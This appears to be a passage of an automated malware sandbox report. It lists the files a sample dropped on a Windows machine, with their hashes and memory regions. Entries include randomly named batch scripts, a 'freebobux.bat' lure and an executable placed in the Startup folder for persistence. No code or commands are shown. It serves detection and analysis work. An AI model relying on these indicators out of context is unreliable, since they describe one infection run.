SHA512 ef1c274e8571f84cdf7cd128fc93ed3d015487dfd4ca53d488915fd772313a6fbde76da0985ecb566c3eec8af98740358abe989ec74e6e85ac3dd8f8dcd43b7b

memory/2908-3502-0x000000000C2C0000-0x000000000C9A0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\L6J4GCMD\favicon_a_eupayfgghqiai7k9sol6lg2[1].ico

MD5 12e3dac858061d088023b2bd48e2fa96
SHA1 e08ce1a144eceae0c3c2ea7a9d6fbc5658f24ce5
SHA256 90cdaf487716184e4034000935c605d1633926d348116d198f355a98b8c6cd21
SHA512 c5030c55a855e7a9e20e22f4c70bf1e0f3c558a9b7d501cfab6992ac2656ae5e41b050ccac541efa55f9603e0d349b247eb4912ee169d44044271789c719cd01

C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\78076te\imagestore.dat

MD5 fd5239d23117c03e89e9015265773c0b
SHA1 43f6879fd07a5fa4fecb63efc78f87f4b6c902c2
SHA256 ad75428b466cd88c82b2cc02c9d49b2bb52da140a3d5960f6662a3203d9632b6
SHA512 0a00f6453e5fb1fb43c0dc0a5b5f4a1d3ce31c5ec833c3f24facc8540c94f6e2de355869cce80f0864aea56c4d53051cb9366a8cc59114faa0acc329d8aac83f

memory/3856-3559-0x0000000000C20000-0x0000000000C7E000-memory.dmp

memory/3856-3562-0x00000000002F0000-0x0000000000314000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\regmess_239e6675-cf83-4482-a135-4b30a903012e\regmess.bat

MD5 7c8a2529f9537f733c82bdd1b9ee6311
SHA1 c55ebc368e4a0ba8a44e77cd049e28a125d2e9d6
SHA256 499218914bad2e060cc8556284e329847d9b43d0a6b8f03bbbf5145fea4ad00d
SHA512 32cb874efa8906ec481391b22af937bbcf15cae9b6cc335fe9b3cba0cea67c698278fe79db040c8d8ae84d75d7400910e3b02c26654cfee29917e58d8da31d0e

memory/3844-3611-0x0000000002150000-0x0000000003777000-memory.dmp

memory/3932-3624-0x0000000000A40000-0x0000000002067000-memory.dmp

C:\Program Files\Winaero Tweaker\WinaeroTweaker.exe

MD5 6bb0ab3bcd076a01605f291b23ac11ba
SHA1 c486e244a5458cb759b35c12b342a33230b19cdf
SHA256 959dafbfab08f5b96d806d4ad80e4c3360759c264d3028e35483a73a89aa1908
SHA512 d1123feb97fbf1593ce1df687b793a41f398c9a00437e6d40331ad63b35fc7706db32a0c6f0504cff72ea2c60775b14f4c0d5a8955988048bed5ba61fa007621

C:\Users\Admin\AppData\Local\Psiphon3\psicash\psicashdatastore.prod

MD5 5ad5cc4d26869082efd29c436b57384a
SHA1 693dad7d164d27329c43b1c1bff4b271013514f5
SHA256 c5c24f7ca1c946fa4dfd44407409c8e11ec6e41f0e1c7c45bf8381b42afb31f1
SHA512 36efc511a98e53031d52dacdd40292a46fe5eab0194a0e9512f778f88b84fac5aac1eebb6e281c44e40ef2ddc3cdea41df7f5a50e4024cd86c087ed909fe8629

C:\Users\Admin\AppData\Local\Psiphon3\psicash\psicashdatastore.prod.2.commit

MD5 5298ac25dd66641c380de618e98620ba
SHA1 20f7ed546119f8618d3057af467546e26f9acf4b
SHA256 81d56a45b6764838898647a0013300ea9e5a18e65fb08d0bda5ec1f868739b77
SHA512 12c5626c414a00698bfd44042206e4b8b376f07bbe127b4a4c67adf5837dad858aa8f32851b7266fc3840b8403a0ec89897c017d10e1e2adb834ca0070a03521

C:\Users\Admin\AppData\Local\Psiphon3\psicash\psicashdatastore.prod.2.commit

MD5 db20ff7525c76948dc0b7ed2e4dead10
SHA1 c93b36630f0cd9be6cf2923ddd4d16403968ebae
SHA256 bb160d435b63baf243efa61d0d34daa8df897a6f7480d4b55c7ab79adca18f9c
SHA512 e7dffb2077fddcd02268459595a333c59193346cd2d3ef399ea97491c43a0cd1ae8462a4a516f8d2a3d868bc91fd198607067237bb3ae3aa25cd5d556c030b33

C:\Users\Admin\AppData\Local\Temp\psiphon-tunnel-core.exe

MD5 8cde6943b4d4d6e84c1abc9683c63d8c
SHA1 b863a290d1fd697d51ee2d7ef69f3f3b828a03d1
SHA256 17ffc757e9be1b332c762187b26beaf7ca05aba45d85df28e4894060022b76d6
SHA512 1fbcf6f38e99e06f46157f17c168ad86180da176e429c87d4c1b6b4e139624ee9d00def194c51e96340f2ae6ad7ae0219a01b435f9bedc6b0992a52c0144f4d2

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 72c7c8c07101b27fa3fd40a5d8ac513e
SHA1 d373b24220c13fee50f08d1062950230718327af
SHA256 a285995a999416ded29bff78c6cd6398fe7f57dc95e763713314aa59b8f5b2cb
SHA512 c15f71832bf7c6ba0121f67bc0e45e71f94ad44d9a31837d258c378b5e32460a716d5a8cc64d305ffba30e7d367952ecba1f3625c4093450a6f2ae2444c5e272

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 5f915f9dbaaccd1bf78e2b5cc1e0d82d
SHA1 109e5895e3747531b3de5a577c369ca38f1a5ef7
SHA256 4d85df9a28738ec7e18002a8e4057cb2b1bb16934cb4de1d44900c3874914cb8
SHA512 1411cbb174332326e2d2d7878b0f39e69231d86a55584f8160f509f1000a228ff9056b49518f62147ac97753e76fd2ea6e644f780be9ce85c4b0abe0ef3f9bed

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 37d06293bec42e5e5c944f1233ad806c
SHA1 048e4f859f806012aa221b15967444500168aa07
SHA256 43153930c7e2c522d6aa5354ede7d93d00d4376f9cfc4ecd5e5b6b05e809f00e
SHA512 c538b7ee554578dadb33c8166ae41022f35efabc8155c4fe81c1fdee0c404e06482d73bb07d9bb7eb3b26bdbd3935afa4b51c0c7db74584975827b25a1020b5f

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 2f7f05af4085faaeb1234b9867c53ee0
SHA1 06cd753449110c36214a9a12514f860256021629
SHA256 36bad66805a5e5acfdd070b9bdb1ad00dbd5d3a508615807862ccb7b7f935aac
SHA512 c7dd07ed20e894301e7da945e63d117a2907c2f85db93331e741f4ed5023aa079103563aa12d07c00860e5d80eda6415ba74cc69a0aa90d98cdaa3079b01512c

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 0585c71e8b627117018fe98f6d4e997c
SHA1 7e8be006e0f9b807b909f782d0aa562d52091a26
SHA256 eeb3dc4089b2c08151d3e8532fa1cabe6de940b566bac0f981b34745c4d30585
SHA512 b93b45b4861cbf35ff421407b873df0ac9af044086557079225eac6a2c2783a1d1d7f4475f78d1ff427df3e795f88c97c176bb0b265877dca5b6d24aef5f1f27

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 82f7481c6d2657b0751e2f99d8d7f60c
SHA1 1eff6dc53bdf88795c2db6c2844de695cca37d91
SHA256 e25f09b908f4fc08eeab97a268de8cb207af1e140f412a6dbd628f173d47a20b
SHA512 4fe1e2a9af4d9e47ce6c01bae02ffac9f321bfd7d79ddfc58538238d460add90b77e58af0cfbe27e910c9f128c9950170b384f8b0cafc33589ff7ff605112f75

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 200721a4e509b21e31368f1a0bed8a30
SHA1 ca469b14da46e833784f741e4631359043340391
SHA256 208d7946a68e4e60797a310f704871e0a3b2ec6f45d232bfdf34fe445c8e1284
SHA512 4b3112f14d3e0c17acd8adc27c3f8a05842763cfb20901e3d59a42d2c8c863cd9d800189cbb9a450d8918aa2b10d37be19aee35a92a2799e840bc1a4d0707229

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 99d58cad8024cdb5efcb790ceeed833b
SHA1 406f885d63dc90d68f0a9c2b2ad35906f9564f2f
SHA256 6c67f1c6bba736910695ee40013cbc1dcdb40206a7eaaeb4eb5a1aab6f49d9da
SHA512 f9fbf9256ab6c85cb5f2dc87b5508611190b929b2ab18a2f784f2cc95aea2c69eb9c04010ed1a39dcbcc4a50f70db9488294a182d5a8b5f6579428b47af35135

C:\Users\Admin\AppData\Local\Psiphon3\psicash\psicashdatastore.prod.2.commit

MD5 413dcccf90fdf3971f4515206484c425
SHA1 11a604dcc3653196a3bbea431b918f473c4a2b85
SHA256 e1f53f85431f2b7c0dde53cdde0afef39380835b49a6add8577699574ae40ed0
SHA512 42d50a7f371c961cd30f7e3fa311b8df1a93d5314a19fdd6285a0a5aa9f9d886e3b54d6ef62e8304ba00e0fb5f686be44337041f1bfc90e4982ab3a8a0d9dc39

C:\Users\Admin\AppData\Local\Psiphon3\psicash\psicashdatastore.prod.2.commit

MD5 8c4bc7e33b00e0be9a8b8fc11ee2b767
SHA1 0fc4b04121eea70779eed2af54ff7969755b2b13
SHA256 f190ad299ac910b44a64c28eb1e27e042eb4ca6fdcb7087cd82001cac6c4aa5f
SHA512 5a59da5ab85dcb10e4059721a154e9ab96345811ff01cb5b043370a9e275b1f361666010e01c1a75a8e8e8c46d12b54a8a43d32c3e41820e04dd85ab3ce7dc1f

C:\Users\Admin\AppData\Local\Psiphon3\psicash\psicashdatastore.prod.2.commit

MD5 bc16bece34decbc4586579142554ed18
SHA1 7aa956f194b36d541c71283b6844e54e33f00390
SHA256 7c290d277de0aa83de1402478faf3495f0c6e5d3ff1bd96fa0d74dc599ba4bd4
SHA512 a7481689a29dcab138796909c5536646bd786545c8196276f8bf532e2e9dd498fc7ae2948b455c348872a6754ccbded352f112c3985584f42750db45f80038da

C:\Users\Admin\AppData\Local\Psiphon3\psicash\psicashdatastore.prod.2.commit

MD5 dd4ab86bba90ccfdf304636ca365a406
SHA1 2278c4024f4962a734290e89b516c174d7351e9c
SHA256 bebea0756c4f49c5c2bbf9f66ed707da1d6d2e7d90f9d7c66ac60747af4fead6
SHA512 3b361c43bcc0816a397b0705264c266c27dd6ed4a6adef656d71997ce27820f99a57e85d2edb226785e48d76de784169245f3c9530aab0102fc9c95043d7758e

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 c50fec4e8a9398f6a6080afb78e1b3b1
SHA1 5cac0c06e2bf6195a9a2ae59d29b023bce66ae3f
SHA256 c0f82fc52120b9074c12c837f9895b6d9ab5e077f54a75df2e5916d9caf6d89c
SHA512 2399d37e343a7d9128cd566c13e31954a86b9114f4f417a53b15b47e16da153c5722993ea4f868462e2c5454fcbf68a51f4de6d3008a2eb88e11bb241b6f7486

C:\Users\Admin\AppData\Local\Psiphon3\psicash\psicashdatastore.prod.2.commit

MD5 6e97b1e9e92ae4998cec2f7c538b86da
SHA1 4990cb26699d69c2a0b503a46addceae58d52772
SHA256 a1a3d38d86758c746d92ce162dbcf73cf2ef0bcc7ff158969989ddc2312ec203
SHA512 4b05b81d46e8efd887eb91d845085c9b83e1a64182e064b757c6d2eb74f2d95b0a325401efbae506fb0e1a278040dd2b23a98fa0b1fff2b80aabc906e1a42eee

C:\Users\Admin\AppData\Local\Psiphon3\psicash\psicashdatastore.prod.2.commit

MD5 9fa2cc88f66a81f359ff33af32bc2727
SHA1 d3a41306961552ae467ed6ae7a456598d2f44e31
SHA256 eb62c1af572fb36074f3b7ea73f0a191c7cae3eabbe7590874f603b94b960365
SHA512 d5e545de98c3f93fcd2ff31ac48e7ab8b15a374ab85ffa76dcc2d87ce09964a5f19c77f6339c00725e1a608c05f4f476a4881d7f88bffe56406c497b458298aa

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6G4X5UFP\favicon[1].ico

MD5 f210fc0564ae5a5a2985b2848e75cba2
SHA1 29bf0540e4c291cc6c6d071ac8125cc65314fbe9
SHA256 d453748d5f8e5bb6c62791b97c733dba1d7dc3340bde957470285b2a7185b7ec
SHA512 46fac4e98cc34105d74a8a159c70d48191612f88e5ab1a7ee7276e7b2c95407d71d307509ef8b9f0aed28465688839f49b2a55da4b03f7d01b3f03c908067e8c

memory/1272-4491-0x0000000001260000-0x0000000001584000-memory.dmp

memory/2024-4492-0x0000000000CF0000-0x0000000000D7A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\wimloader_fb327d75-e738-4d0c-bcde-5d4cf1554e73\caller.cmd

MD5 7aa447ec3e79e0d47516536d24a56ae5
SHA1 b91f565b38bbbee8924640507680750757e96ee9
SHA256 9b406b2eb50917ab2fd8a494c800665f61adebb878bb21f73b0c477b980957b5
SHA512 9a5ed7effc54f1da116c831e9fb3bf1b0d37b2bf6995d18e197ac5330e1100ec98f144148b5285da149df7dd20fe82f62f681f3155b25f922c1b201d82d34e3a

memory/3844-4518-0x0000000002150000-0x0000000003777000-memory.dmp

memory/3932-4519-0x0000000000A40000-0x0000000002067000-memory.dmp

memory/3144-4544-0x0000000000EA0000-0x00000000011C4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\vPDJkNgZb2qQ.bat

MD5 02b31070e4106f366e4745a259fd02a2
SHA1 1a2e4204c48b0a6bd7dfd58b353a4ddace8478c5
SHA256 62eb0559d3fd4b1d90f0bd93f75598a36a64bf72cb541c65eadcdad81fb21cc8
SHA512 8f4ce4bfe17a5215d793ad257699d4c00c282e403fc151a3fb27800af874d1f1af4c12bc615b313117780d69976c4ce188acb2c8ab59c93851b06c5bece1d812

memory/3052-4581-0x000000001B5C0000-0x000000001B8A2000-memory.dmp

memory/3052-4582-0x0000000001E00000-0x0000000001E08000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\DS2lJjxX5bYw.bat

MD5 98e5e26ecbc0e505b16e1e7d40be8691
SHA1 4ccfa88ca0aa3beac694d51121fca07faab88e59
SHA256 bce48ba09fd04d468aa4b522573ddadf27c6ee42181a6da6f7c7bab896c793ae
SHA512 2f8ac7be2b7b92ab59bf4ac3646713769f14226ebd99d1226800f0b3be90976a31e79885a9df19c6c459a6d1c4b88e3315c817474d5a5817099d704871adc2c3

C:\Users\Admin\AppData\Local\Temp\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\.ba1\logo.png

MD5 d6bd210f227442b3362493d046cea233
SHA1 ff286ac8370fc655aea0ef35e9cf0bfcb6d698de
SHA256 335a256d4779ec5dcf283d007fb56fd8211bbcaf47dcd70fe60ded6a112744ef
SHA512 464aaab9e08de610ad34b97d4076e92dc04c2cdc6669f60bfc50f0f9ce5d71c31b8943bd84cee1a04fb9ab5bbed3442bd41d9cb21a0dd170ea97c463e1ce2b5b

C:\Program Files (x86)\DroidCam\lib\install.bat

MD5 cfaaa32cc4fd40e36512f768bd75a0e1
SHA1 6ed1063ab547f65aace2fd98713df6d29834c19a
SHA256 d7b86a37b02fed2794904cb28c0fa64a1e0d2218fab608250c8531c1b9ddc439
SHA512 d2fe74d8e10b6378c48b72c9e22515a31592859d1f725bc86d9e48fcce9f7421e7afe477feb1c2041ff46b2620ad4244c887c670dc25e8acd70029e2166a0a93

memory/3052-4850-0x0000000002A00000-0x0000000002A0C000-memory.dmp

C:\Windows\System32\DriverStore\Temp\{4864994d-257c-46c0-0e86-0017f15e0819}\SETD098.tmp

MD5 f6e94e3d7d3fe771b1933e06b7ba79b5
SHA1 65da1b5ab85f7b60f88c92101fdf95bfc7fe3931
SHA256 2a6124f7df464a02fc560cdf982eb3a65793e0c9252b361ec1e386bf4f63b60c
SHA512 45cc73010f8b3b638ce7349179a1a603ec009d0ce1066beafa03cc85c3a5a055c6430e50b9e298411d8dd617b698fd49364f8491ac95768a0a91c01c9e4390d4

C:\Windows\System32\DriverStore\Temp\{4864994d-257c-46c0-0e86-0017f15e0819}\SETD099.tmp

MD5 aed4aa73848bd3423c170bf58f8febfa
SHA1 dfac68f7df29410357c00effee42e40bd0491167
SHA256 1cd87356a573e9def505dc8cc5e9f682e3cceecf499f50007b85def3c842b630
SHA512 4a9900d422447c59342c88e164d81c4187743e63eb5f993800311397bbdf43bea90e456b720fcd3e679bf029be70220e0b89c60d2717bf278d76c1049d921bfa

C:\Windows\System32\DriverStore\Temp\{4864994d-257c-46c0-0e86-0017f15e0819}\SETD09A.tmp

MD5 65f3e2bdb187ef73ce65b92c770594dd
SHA1 514f571ed0f89e50b53909e3f9550cad6107ceea
SHA256 13d6fb4d2284ec6b138740aaef4c7f6ac82e78d59891f4e51c8656f05150db8e
SHA512 2b5def159bd09b20cbcd03de3d2973c1fd216b35de71006c3077aeeddb71165075545941ebd53807fdd5cf682ec3eaadaeab9504b55a85c895cc1b811cf1a0c0

C:\Windows\Temp\CabD0D8.tmp

MD5 d59a6b36c5a94916241a3ead50222b6f
SHA1 e274e9486d318c383bc4b9812844ba56f0cff3c6
SHA256 a38d01d3f024e626d579cf052ac3bd4260bb00c34bc6085977a5f4135ab09b53
SHA512 17012307955fef045e7c13bf0613bd40df27c29778ba6572640b76c18d379e02dc478e855c9276737363d0ad09b9a94f2adaa85da9c77ebb3c2d427aa68e2489

C:\Windows\Temp\TarD0EB.tmp

MD5 b13f51572f55a2d31ed9f266d581e9ea
SHA1 7eef3111b878e159e520f34410ad87adecf0ca92
SHA256 725980edc240c928bec5a5f743fdabeee1692144da7091cf836dc7d0997cef15
SHA512 f437202723b2817f2fef64b53d4eb67f782bdc61884c0c1890b46deca7ca63313ee2ad093428481f94edfcecd9c77da6e72b604998f7d551af959dbd6915809c

memory/2428-4912-0x0000000000FC0000-0x00000000012E4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Kzc7NpqR3EAQ.bat

MD5 f80c74ceb3473412beefb75d97bab0ef
SHA1 a7cb219cd61d9ed1ca21c59a263c598ad96e4d0a
SHA256 377fef8da77cbfcf117e1ce269ae60961ca8cf99937997820f50ab3259da1cd7
SHA512 3606f0ee94539242a0e45460a31863a3813118d71dd04925c811caf94f327cebbe114c5d11c314a1cea87acf511e3c04e3b8301b1ea79841fbc16d15a9628373

C:\Program Files (x86)\DroidCam\DroidCamApp.exe

MD5 f8c12fc1b20887fdb70c7f02f0d7bfb3
SHA1 28d18fd281e17c919f81eda3a2f0d8765f57049f
SHA256 082f5c3fd2fd80505cbd4dbdbb7c50e83c2e81f033a04ea53832dbf0a3fc4933
SHA512 97c5d158abb119e076ace4b1398de19029b5d44566d9a293811bf7edbb0db120354cc396aed72bf62766799dc5db266d4b2ee7aee3ffc2818d8be77a4665ad2f

C:\Program Files (x86)\DroidCam\Uninstall.exe

MD5 de2a97a1e50afa4fec443a8930606ddf
SHA1 4133434c37472ab14443704dd9ad8e8546f3098f
SHA256 5cf6e6e22cba884b20da6cf701546613792c15f30d4c27273a432fb185f29416
SHA512 d25e638a7925d0be5bbb081f5edda506603252916c3d3868d2bcdcc31484547efb893130a6b5eccc781bfece702c59d34fe67a84a48e379916fc15568adcdc49

C:\Users\Admin\AppData\Local\Temp\nsy5699.tmp\System.dll

MD5 c9473cb90d79a374b2ba6040ca16e45c
SHA1 ab95b54f12796dce57210d65f05124a6ed81234a
SHA256 b80a5cba69d1853ed5979b0ca0352437bf368a5cfb86cb4528edadd410e11352
SHA512 eafe7d5894622bc21f663bca4dd594392ee0f5b29270b6b56b0187093d6a3a103545464ff6398ad32d2cf15dab79b1f133218ba9ba337ddc01330b5ada804d7b

C:\Users\Admin\AppData\Local\Temp\nsy5699.tmp\nsExec.dll

MD5 0a6f707fa22c3f3e5d1abb54b0894ad6
SHA1 610cb2c3623199d0d7461fc775297e23cef88c4e
SHA256 370e47364561fa501b1300b056fb53fae12b1639fdf5f113275bee03546081c0
SHA512 af0c8ca0c892f1b757fbd700061f3d81417dff11d89bdff45e977de81ad51c97862406cf7e230e76cf99497f93f57bf09609740953cd81b0d795465ac2623ea8

C:\Users\Admin\AppData\Local\Temp\nsy5699.tmp\nsDialogs.dll

MD5 12465ce89d3853918ed3476d70223226
SHA1 4c9f4b8b77a254c2aeace08c78c1cffbb791640d
SHA256 5157fe688cca27d348171bd5a8b117de348c0844ca5cb82bc68cbd7d873a3fdc
SHA512 20495270bcd0cae3102ffae0a3e783fad5f0218a5e844c767b07a10d2cfab2fab0afb5e07befa531ba466393a3d6255741f89c6def21ec2887234f49adceea2f

memory/3140-5039-0x00000000002F0000-0x0000000000614000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xMpCKpeM4s9U.bat

MD5 4422d2e48949e48c573277d1be4081f0
SHA1 eb2315dc1f93755618bbb29f3dc77d2d5d36cb3a
SHA256 d8fe293748dc53db9114169096f9d924f43cebb62e365136ff2cec6dbc4124d2
SHA512 a0feb94660141857032f8503603cd5ca7e473dd70c1846c6f331fa30e89ac247be052af8a35d8cf07c8b730ee21ca39cb99001a43466936c8136414be8a8e16c

memory/3292-5317-0x0000000000ED0000-0x00000000011F4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\exkVVvci5sM8.bat

MD5 6fe63378a187e858c5c5a54ebff68200
SHA1 bd642e0575619db40cc78aaf01632be53a7a246a
SHA256 444da56cbb00149d18365bc2df5c4b50b1821b1cd374570e166d4df746fa6d4e
SHA512 d42b1075d336d879d57d7a42993fec19838795796206ab412966e56ca498531d2e2fe743ee743ce8ca197d6f9e6f05fc571255518aef1485265122cd6a52b443

memory/992-5433-0x0000000000110000-0x0000000000434000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\SotQmsnK8LSD.bat

MD5 ff4b687cd6a8ad2cdacab585ecdd8230
SHA1 b0cf361102a64ccfc7c0d2542ee47591a0817ff1
SHA256 bc7c33bc3b8c84cdd8137e391cf45bf54fa9acf657786bb6da5301aee8a986bc
SHA512 6c0656067dee8db634f52e36d86b2f48e5f0123e0d8f49e451326e17ada259b5c4add7f6c95ddb4bfa69f84ef362a0f6f36992efa4d90b37be705a4c10cd7538

memory/480-5605-0x00000000056D0000-0x0000000005B0E000-memory.dmp

memory/480-5608-0x00000000056D0000-0x0000000005B0E000-memory.dmp

memory/3052-5607-0x0000000000400000-0x000000000083E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\6CB7.tmp\freebobux.bat

MD5 202d76eb2952aeb2e241c13defe48045
SHA1 34e26a3407288c7ea63bd1cd305c27b06b163386
SHA256 9d99aa3263624e3a9434af76bac620f71598c082b35504de738d1c04af079fab
SHA512 6a78847878c3ee4ef82a61d03e4f61f681ad7c2d62d5ff10645f17fa2acf63bc76b5862043bb94eaf7d80ce0ab2c35a904ef6de178623d42111c453c5ee9f3d3

memory/2872-5622-0x0000000000160000-0x00000000001AA000-memory.dmp

memory/2872-5623-0x0000000000290000-0x00000000002B4000-memory.dmp

memory/3332-5640-0x00000000012A0000-0x00000000012E0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\wim_75044109-eb7c-4c16-885c-f601bfbd929b\load.cmd

MD5 be6bfde09df708f7e8cbda39a6ab17f6
SHA1 dc7f48ebf62fdd4b2a2935b23245a20bb9c3b237
SHA256 fe1a8ee1e2d6da92ea4a8bb0ab40b7bf8d06cd571bf627671838ac8dce3c15e8
SHA512 71751cf9e79e50a330bf1e237ce507799d965b2b56e196ee23cdb96aadbc8538fa57fe6fbb8415678da35fa98abc0e746c0c7570d6ea155ea7bd6be840d7177e

memory/3112-5650-0x0000000000970000-0x000000000097A000-memory.dmp

memory/848-5787-0x0000000000320000-0x0000000000644000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\zIF5T2gxy810.bat

MD5 c7458c30bc8333e28b866de22462fad6
SHA1 f8fd0979872e13829333725d1a97ab12d8402a7c
SHA256 cb0042e879499b7739503d64ca310d1d4249810144d868f15185bf42fcfa4e12
SHA512 65b73315634620b1e56ecd1190087716dd2f067d74f8c5ce4a675baa8042b8d4e526dfa3c3daaff3f566b130f62a15f0583b65281c31eafd08281084c463f51e

C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\DOMStore\5ENOHPAD\www.youtube[1].xml

MD5 c1ddea3ef6bbef3e7060a1a9ad89e4c5
SHA1 35e3224fcbd3e1af306f2b6a2c6bbea9b0867966
SHA256 b71e4d17274636b97179ba2d97c742735b6510eb54f22893d3a2daff2ceb28db
SHA512 6be8cec7c862afae5b37aa32dc5bb45912881a3276606da41bf808a4ef92c318b355e616bf45a257b995520d72b7c08752c0be445dceade5cf79f73480910fed

memory/3052-5921-0x0000000000400000-0x000000000083E000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\DOMStore\5ENOHPAD\www.youtube[1].xml

MD5 570be43add1e20c58bd6824598fb0f4c
SHA1 9401e2ca69b6d56a220518e63e8e5337dd6d45ec
SHA256 553470049060e2b179427ffaec4820c38b76bc4f577dba3bdadb35567026ee75
SHA512 fbbfd7570f805842e0aea53828b7fa34adeb780e9fa577ff3d8caea70545d78922ee5149f292c9a982ea8508fca8f0795001773720e5938f3bfedc528c5754d5

C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\DOMStore\5ENOHPAD\www.youtube[1].xml

MD5 32fbb5ad9bf5593630facff0e5a0c5a9
SHA1 e4ff808ac5b2aef1b2c7c2a2be17484c4d944c73
SHA256 17c4cdb8aff9a91149e5fb67d11ce348ed6b001327f3190e4b02c8fa2cf90c0e
SHA512 b1fcb732ab928c8f97e2269c198c3fdf6385c7f00f03dc87a8ce81c92db529bc8912b4b53b0b7412a1f484d79cacab432f73d6689081b7b6104f05a10f1ff012

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7c148ac38012fc3caa04b1bbe75feba0.exe

MD5 ad8378c96a922dcfe813935d1eec9ae4
SHA1 0e7ee31880298190258f5282f6cc2797fccdc134
SHA256 9a7b8171f8c6bd4bb61b7d8baf7dab921983ab7767705c3f1e1265704599ab98
SHA512 d38a7581ef5c3dcc8752fc2465ad698605bbd38bf380201623265e5ef121510d3f34116438727e60b3832e867e2ed4fd52081d58690690ff98b28cde80f6af5f

memory/480-5964-0x00000000056D0000-0x0000000005B0E000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\DOMStore\5ENOHPAD\www.youtube[1].xml

MD5 1fa3965f51e94fac2988005e81dff06b
SHA1 ccf56e2d64c083f21bb9f9a0125cb5f41f485d88
SHA256 d6c37a810aab3ab3f751d2c952aade36ae5fa9cc5418c3871f10fe2670834ff4
SHA512 40e23d16fb9976d0f798525dbb44b570b9cd5a6369a4efc144e76c8417a090eda9d4a5d852cabc81d3c9f6c4f05372616e304d5fea40896dcb05f7e09659221e

C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\DOMStore\5ENOHPAD\www.youtube[1].xml

MD5 1540df8bb77b75cacd201783901976c4
SHA1 aed61ae8611aa24ecc547da38c48c395b47a7314
SHA256 a039e3d2553064dcd5075aedfc7ca42120be2cadbb3b3af2b694fd89f1adf1a4
SHA512 f82615834b31c7fff60badea127c2d51b3d170a8906733cb7ed93343b360fe269492a599c57dfcb0ce1f77ce9bebaa9ee7f230657a93af9ff8eb9c4c607657c3

C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\DOMStore\5ENOHPAD\www.youtube[1].xml

MD5 25ab1c6bc25ff38b6b50fd3a36065049
SHA1 a13b75264171ab7eeba96007e326ccdb8dd6f12b
SHA256 fd8daee4a5abcbed5ad932b39c487a246008142bacfaad4cd821b038f4961077
SHA512 520da2cf7941d4ec07404fc3521a518c836b2f8483a4fcb587d02940205bc1193b03619a33a9a9eed2d6b384090fe8ddbd558757a9650081e6c3d73fafee3921

memory/3336-6009-0x0000000000A50000-0x0000000000D74000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\QmdQV8raYufy.bat

MD5 adc3c96844112c850fe54692c5b80167
SHA1 157361c825271ccc1c2b0db70cca3c899ee33eb2
SHA256 244e0c80661bc8f95f7cdc2430058cbed53037c7dfbca804609aaae10990e4e4
SHA512 b36614b0cdabb2fb8f809854202b159f92a7dc0e86d4f863d391acfe28ac472512c08f350b7d8143745575eafa25df893508af88fb2861a2f9c8edd578b78f0c

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\L6J4GCMD\favicon[1].ico

MD5 f3418a443e7d841097c714d69ec4bcb8
SHA1 49263695f6b0cdd72f45cf1b775e660fdc36c606
SHA256 6da5620880159634213e197fafca1dde0272153be3e4590818533fab8d040770
SHA512 82d017c4b7ec8e0c46e8b75da0ca6a52fd8bce7fcf4e556cbdf16b49fc81be9953fe7e25a05f63ecd41c7272e8bb0a9fd9aedf0ac06cb6032330b096b3702563

memory/1540-6139-0x00000000012F0000-0x0000000001614000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ORLHVJxSJiqt.bat

MD5 7cd9f0ed81ac6fe05eb78182b6e92f13
SHA1 469adadd0946b912df1a5ceded0389b47296ca5e
SHA256 0973a3ff63012b6cef5b018b55ab11f25dce0503b1b400a787d226dd317f21f2
SHA512 cea3e6d7d2884656ea0c784f8a69d48214ae68bec4da588df584b24209db6447e69f525bf72640b34e663d055d7e9557c2a873f4499d56cd8d491e0cc2de981e

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\9GP4P3HF\4Kv5U5b1o3f[1].png

MD5 a81a5e7f71ae4153e6f888f1c92e5e11
SHA1 39c3945c30abff65b372a7d8c691178ae9d9eee0
SHA256 2bc7a47889c56ad49f1b8b97385d5a4d212e79bb8a9b30df0665a165f58b273e
